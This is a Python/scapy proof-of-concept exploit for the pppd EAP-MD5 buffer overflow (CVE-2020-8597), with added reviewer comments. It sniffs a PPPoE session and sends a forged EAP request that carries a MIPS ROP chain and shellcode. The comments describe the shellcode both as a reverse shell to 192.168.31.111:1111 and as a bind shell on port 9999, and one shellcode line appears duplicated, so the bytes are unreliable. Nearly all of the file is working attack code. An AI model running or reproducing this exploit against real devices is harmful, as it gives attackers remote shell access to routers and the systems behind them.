# https://github.com/paulusmack/ppp/commit/8d7970b8f3db727fe798b65f3377fe6787575426
# https://github.com/WinMin/CVE-2020-8597
# http://asm.sourceforge.net/syscall.html
from scapy.all import *
def packet_callback(packet):
    """Record the addressing of the first sniffed PPPoE-session frame.

    Fills the module globals ``sessionid``, ``src`` and ``dst`` that
    ``eap_rsp_md5`` later uses to build its forged frame, and echoes them
    to stdout.

    Note the deliberate swap: the frame's *source* MAC becomes our ``dst``
    and its *destination* MAC becomes our ``src``, so the forged reply is
    addressed back to whoever sent the sniffed packet, impersonating the
    other end of the session.

    Args:
        packet: a scapy packet carrying 'Ethernet' and 'PPP over Ethernet'
            layers (the sniff filter below only delivers such frames).
    """
    global sessionid, src, dst
    pppoe_layer = packet['PPP over Ethernet']
    eth_layer = packet['Ethernet']
    sessionid = int(pppoe_layer.sessionid)
    src = eth_layer.dst
    dst = eth_layer.src
    for label, value in (('src', src), ('dst', dst), ('sessionid', str(sessionid))):
        print(label + ': ' + value)
def eap_rsp_md5():
    '''
    Build and send one forged EAP-MD5-Challenge request over PPPoE.

    The frame is addressed using the ``src``/``dst``/``sessionid`` globals
    filled in by ``packet_callback`` (so ``sniff`` must have run first;
    otherwise this raises NameError).  The EAP-MD5 "name" field carries an
    oversized buffer: padding, a MIPS ROP chain and stage-3 shellcode.

    Frame layout (from the original author's notes, kept for reference):

      Ethernet  src(6) dst(6) type=0x8864 (PPPoE Session)
      PPPoE     ver=1 type=1 code=0x00 (SESSION) sessionid(2) length(2)
      PPP       proto=0xc227 (EAP)
      EAP       code=0x01 (Request) id(1) length(2) type=0x04 (MD5-Challenge)
      EAP-MD5   value_size=0x10 value(16) name(...)

    Every address below is specific to one target build (the libc/pppd
    offsets and stack range in the author's inline comments) and must be
    re-derived for any other firmware.  That fixed addresses work at all
    presumably means the target runs without ASLR, and the ``rwxp [stack]``
    annotation means its stack is executable, which is what makes jumping
    to stack-resident shellcode viable here.
    '''
    # 16-byte fixed MD5 challenge value; the PoC has no need for it to be random.
    md5 = b'\x01\x12\x23\x34\x45\x56\x67\x78\x89\x9a\xab\xbc\xcd\xde\xef\xf0'
    # cache incoherency
    # Saved-register values restored from the overflowed frame.  Per the
    # author's gadget annotations: the s5 gadget does `move $a0,$s1; jr $s0`,
    # so with s0 = sleep and s1 = 1 the chain first calls sleep(1) (presumably
    # the usual MIPS trick to get freshly written stack bytes past the I-cache
    # before executing them -- confirm); the ra gadget then does
    # `jalr $s5; jalr $s3`, i.e. jumps to the stack address held in s3.
    # Bytes are little-endian (each word is byte-reversed relative to the
    # address in its comment), so the target is mipsel.
    s0 = b"\x40\x61\xF1\x77" # libc 0006C140(sleep) 77F16140
    s1 = b"\x01\x00\x00\x00"
    s2 = b"\x66\x66\x66\x66"  # presumably filler; no gadget comment references s2
    s3 = b"\x00\x64\xFF\x7F" # 7ffd6000-7fff7000 rwxp [stack]
    s4 = b"\x66\x66\x66\x66"  # presumably filler; no gadget comment references s4
    s5 = b"\x88\xe1\x40\x00" # move $a0,$s1 // jr(jmp) $s0 // pppd 0040E188
    ra = b"\x14\xD0\xED\x77" # jalr(call) $s5 // jalr $s3 // libc 00033014 77EDD014
    # https://www.anquanke.com/vul/id/1065300
    # Reverse shell, connect to 192.168.31.111:1111
    # NOTE(review): this header says "reverse shell to 192.168.31.111:1111",
    # but the comment on the `rop_chain += stg3_SC` line below says
    # shellcraft bindsh(9999).  The two disagree; confirm which payload these
    # bytes actually are (and the hard-coded IP/port) before relying on it.
    # NOTE(review): the second and third stg3_SC lines are byte-identical --
    # looks like a duplicated line; verify against the generated shellcode.
    # Raw MIPS machine code; not regenerated or decoded here.
    stg3_SC = b'\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04\x28'
    stg3_SC += b'\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01'
    stg3_SC += b'\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01'
    stg3_SC += b'\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x09\x09\x01'
    stg3_SC += b'\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09\x01\xc9\x0f\x02\x24'
    stg3_SC += b'\x0c\x09\x09\x01\x03\x57\x05\x3c\x01\xff\xa5\x34\x01\x01\xa5\x20' # 0357
    stg3_SC += b'\xf8\xff\xa5\xaf\x1f\x6f\x05\x3c\xc0\xa8\xa5\x34\xfc\xff\xa5\xaf' # 1f6fc0a8
    stg3_SC += b'\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24'
    stg3_SC += b'\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08\x35\xec\xff\xa8\xaf'
    stg3_SC += b'\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff\xa8\xaf\xff\xff\x07\x28'
    stg3_SC += b'\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec\xff\xa4\x23\xec\xff\xa8\x23'
    stg3_SC += b'\xf8\xff\xa8\xaf\xf8\xff\xa5\x23\xec\xff\xbd\x27\xff\xff\x06\x28'
    stg3_SC += b'\xab\x0f\x02\x24\x0c\x09\x09\x01'
    # 0x184 bytes of padding reach the saved registers, then s0..s5 and ra in
    # the order the epilogue restores them.  The 0x184 offset is the target
    # build's frame layout -- TODO confirm per build.
    rop_chain = b'A'*0x184 + s0 + s1 + s2 + s3 + s4 + s5 + ra
    # Nop slide
    # 0x00000000 encodes `nop` on MIPS; the slide presumably absorbs error in
    # the s3 stack-address guess.
    rop_chain += b'\x00'*0x100
    rop_chain += stg3_SC # enhex(asm(shellcraft.mips.linux.bindsh(9999),arch='mips'))
    # Just padding the end a little, since the last byte gets set to 0x00 and not everyone uses a 4 * 0x00 as nop
    rop_chain += b'\x00'*0x4
    # The overflow is carried in EAP-MD5's optional name field; the rest is a
    # normal PPPoE-session / PPP / EAP encapsulation addressed back to the
    # peer learned by packet_callback.
    pay = Ether(dst=dst, src=src, type=0x8864)/PPPoE(code=0x00, sessionid=sessionid)/PPP(proto=0xc227)/EAP_MD5(id=100, value=md5, optional_name=rop_chain)
    # NOTE(review): no iface= is passed, so scapy presumably sends on its
    # default conf.iface, which is not necessarily the interface chosen for
    # sniff() at the bottom of the file -- confirm, or pass iface explicitly.
    sendp(pay)
# Interactive driver: list interfaces, let the operator pick one by index, sniff a
# single PPPoE-session frame from it so packet_callback can learn the peer MAC
# pair and session id, then send the forged EAP request.
# NOTE(review): show_interfaces() presumably prints its own table and returns
# None, in which case the surrounding print() only adds a trailing "None" line.
print(show_interfaces())
chosen_index = input('index < ')
# input() yields a str; this relies on dev_from_index accepting it as given.
iface = IFACES.dev_from_index(chosen_index)
# One packet is enough: the callback fills the globals eap_rsp_md5 reads.
sniff(prn=packet_callback, iface=iface, filter='pppoes', count=1)
eap_rsp_md5()